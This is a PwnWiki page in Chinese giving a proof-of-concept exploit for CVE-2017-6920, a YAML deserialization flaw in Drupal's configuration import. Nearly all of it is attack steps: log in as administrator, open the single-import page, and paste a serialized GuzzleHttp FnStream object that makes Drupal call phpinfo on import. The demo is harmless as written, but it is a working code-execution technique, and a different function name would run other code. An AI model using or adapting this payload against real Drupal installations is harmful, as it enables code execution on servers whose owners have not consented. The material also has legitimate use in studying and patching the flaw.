CVE-2017-6920 Drupal YAML 反序列化代碼執行漏洞

From PwnWiki
This page is a translated version of the page CVE-2017-6920 Drupal YAML 反序列化代碼執行漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(繁體)‎

漏洞利用

登錄管理員賬戶,訪問以下URL: 

http://127.0.0.1/admin/config/development/configuration/single/import

Configuration type選擇為Simple configuration

Configuration name可以隨便填寫,在Paste your configuration here中寫入poc: 

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

點擊左下角的Import按鈕便可以觸發漏洞。

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2017-6920_Drupal_YAML_反序列化代碼執行漏洞/zh-hant&oldid=3518"